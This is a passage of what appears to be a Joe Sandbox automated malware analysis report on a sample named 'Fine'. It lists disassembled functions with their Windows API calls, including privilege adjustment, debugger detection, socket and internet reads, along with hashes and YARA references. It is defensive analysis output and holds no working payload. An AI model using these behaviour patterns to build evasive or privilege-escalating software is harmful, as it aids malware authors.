                                                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00232107
                                                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0023210E
                                                                                                                                                                                                                                                                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 00232127
                                                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00231C81), ref: 0023213B
                                                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00232142
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3008561057-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: ecf7619737871ecf9ed8c069e7c67f582a760a5f18d54f710443e03ad4b242d3
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 377ddba135b54ca42096527bcaab0accc5c2dd4334c0fecf933f05806911b002
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ecf7619737871ecf9ed8c069e7c67f582a760a5f18d54f710443e03ad4b242d3
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 581103B1A20209FFDF148F64DD08BAE7BB9EF45355F148058E68993120C3B1D918CB60
                                                                                                                                                                                                                                                                                                                            Function 0024A570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0024A5BD
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0024A6D0
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002442B9: GetInputState.USER32 ref: 00244310
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002442B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002443AB
                                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0024A5ED
                                                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0024A6BA
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                                                                            • API String ID: 1972594611-438819550
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 03598c0641a1cc2c3e31a557527d81a08e6190ebdaf464a967c3fe0be24e0236
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 70d70275210c54b3c5898af1712f6a26b31f29430641dfaadea5678deebf2a90
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 03598c0641a1cc2c3e31a557527d81a08e6190ebdaf464a967c3fe0be24e0236
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8418371D5020EAFDF14DFA4C949AEEBBB8EF15310F254056E805A32A1EB709E54CF61
                                                                                                                                                                                                                                                                                                                            Function 00252263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00253AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00253AD7
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00253AAB: _wcslen.LIBCMT ref: 00253AF8
                                                                                                                                                                                                                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 002522BA
                                                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 002522E1
                                                                                                                                                                                                                                                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00252338
                                                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00252343
                                                                                                                                                                                                                                                                                                                            • closesocket.WSOCK32(00000000), ref: 00252372
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1601658205-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 0e8d2a38b7f1edf3837eb383898e41f4e91b6e75a7a60b06b3fec926cf735771
                                                                                                                                                                                                                                                                                                                            • Instruction ID: a7f475e1bf5817bb8026e268530b4ea64f93f7f710fc8bc5a238ace699a805f7
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e8d2a38b7f1edf3837eb383898e41f4e91b6e75a7a60b06b3fec926cf735771
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E51C275A00200AFE710AF24C886F2E77E5AB55718F188089F9469F3D3C774AD46CBE1
                                                                                                                                                                                                                                                                                                                            Function 002626DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 292994002-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: de7aa7d390033f692b161759ecbf933c677fed801da30a155ef09a0be1522cef
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 4be644d1854caaeda880f0504d538753f75afaf3e1098671006aed226d3db2c9
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: de7aa7d390033f692b161759ecbf933c677fed801da30a155ef09a0be1522cef
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C212731B10611CFD7129F26D848F1ABBE8EF94314F18C069E84A8B351CB71EC86CB90
                                                                                                                                                                                                                                                                                                                            Function 0024D889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 0024D8CE
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 0024D92F
                                                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000000), ref: 0024D943
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 234945975-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 6ad0fde57d1af5173478db75bb1d5172ce0b30dd1b7f42adfc91b6c8ac156cdb
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 009e79f428447e9cf6f8e44267061ba08d1104af225a13cab6a6a8912e559a45
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ad0fde57d1af5173478db75bb1d5172ce0b30dd1b7f42adfc91b6c8ac156cdb
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5921A171A1070AEFE7249F65DC48BAAB7FCEB41314F10481EE646D2152D7B0EA15CB60
                                                                                                                                                                                                                                                                                                                            Function 0023E472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,002146AC), ref: 0023E482
                                                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 0023E491
                                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0023E4A2
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0023E4AE
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2695905019-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 8c8e669ae348e5e902d0eb16b74084a41f5bd04d28de57721d1fe0a76b56cfaa
                                                                                                                                                                                                                                                                                                                            • Instruction ID: c1f60ab2305c3c7dd93b6cc089bd9504adef27e8d2ae60608c863abda4df13c6
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c8e669ae348e5e902d0eb16b74084a41f5bd04d28de57721d1fe0a76b56cfaa
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5AF0E57082091697D6106B3CBC0D8AB7B6DAE0A335F908741FDB6C20F0D7F89DA98695
                                                                                                                                                                                                                                                                                                                            Function 0022E5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: LocalTime
                                                                                                                                                                                                                                                                                                                            • String ID: %.3d$X64
                                                                                                                                                                                                                                                                                                                            • API String ID: 481472006-1077770165
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 925e046cd194bdaa37ee9cf971637ba3f5c20933f32743eaac253798703bb711
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 972bece555ccc2e3d03023296e40e86de7b37901df9d46eb882ea1f73d77c149
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 925e046cd194bdaa37ee9cf971637ba3f5c20933f32743eaac253798703bb711
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67D012B1C34128FACF94D7D1AC48CBD737CAB29300F568456F906D1040E7A49968BB21
                                                                                                                                                                                                                                                                                                                            Function 00202992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00202A8A
                                                                                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00202A94
                                                                                                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00202AA1
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: a7e1b1a72ece8fa95193385ddce95b87756c6ce9912d0ce3fe6cb3776df14fb5
                                                                                                                                                                                                                                                                                                                            • Instruction ID: bb9ecaaecde0dae8200136f905d2a3ec08e4fc3f14036a63c190c5412fceb9ea
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7e1b1a72ece8fa95193385ddce95b87756c6ce9912d0ce3fe6cb3776df14fb5
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E31D57491132C9BCB21DF68D9887DCBBB8AF18310F5041DAE90CA7261EB709F958F45
                                                                                                                                                                                                                                                                                                                            Function 00232010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F014B: __CxxThrowException@8.LIBVCRUNTIME ref: 001F09D8
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001F014B: __CxxThrowException@8.LIBVCRUNTIME ref: 001F09F5
                                                                                                                                                                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0023205A
                                                                                                                                                                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00232087
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00232097
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 577356006-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 61ca865d536841e5299a4ed012e691d656cdd74963b33b33a1294b3bdfe25b31
                                                                                                                                                                                                                                                                                                                            • Instruction ID: d5011ce1481ca00ddc54b361a4f750071220d96f00a5c4a0e887566e2781d2de
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 61ca865d536841e5299a4ed012e691d656cdd74963b33b33a1294b3bdfe25b31
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2411BFB1914209EFD7289F54EC86E6BB7B8EB58710F21841EE04653251DB70FC45CA20
                                                                                                                                                                                                                                                                                                                            Function 001F5058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,001F502E,?,002998D8,0000000C,001F5185,?,00000002,00000000), ref: 001F5079
                                                                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,001F502E,?,002998D8,0000000C,001F5185,?,00000002,00000000), ref: 001F5080
                                                                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 001F5092
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 0cb2bab86c307f1402d340ceecde919128aec4ceca886aa5daf4b51b5f4f884f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 0ec3dd2c76b4f140696f8a0ea23845bc11322e62ca49eb4f66d5818364f8d44d
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cb2bab86c307f1402d340ceecde919128aec4ceca886aa5daf4b51b5f4f884f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33E0B63150064CAFCF21AF64ED0DE683B6AEB55382F118454FA499A262DFB5DD52CEC0
                                                                                                                                                                                                                                                                                                                            Function 0022E652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 0022E664
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: NameUser
                                                                                                                                                                                                                                                                                                                            • String ID: X64
                                                                                                                                                                                                                                                                                                                            • API String ID: 2645101109-893830106
                                                                                                                                                                                                                                                                                                                            • Opcode ID: a21c9cb0664e48df9b68249449db1a87248170489f4c61ac3f44701601a5b76f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 380b3b29553d27b51f151c2cc2265f2b138138b367a05fc9c7178d5dc96b351a
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a21c9cb0664e48df9b68249449db1a87248170489f4c61ac3f44701601a5b76f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56D0C9B481112DFACF80CB90EC88DDD73BCBB04304F114651F106E2040D77095489F10
                                                                                                                                                                                                                                                                                                                            Function 002441FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,002552EE,?,?,00000035,?), ref: 00244229
                                                                                                                                                                                                                                                                                                                            • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,002552EE,?,?,00000035,?), ref: 00244239
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
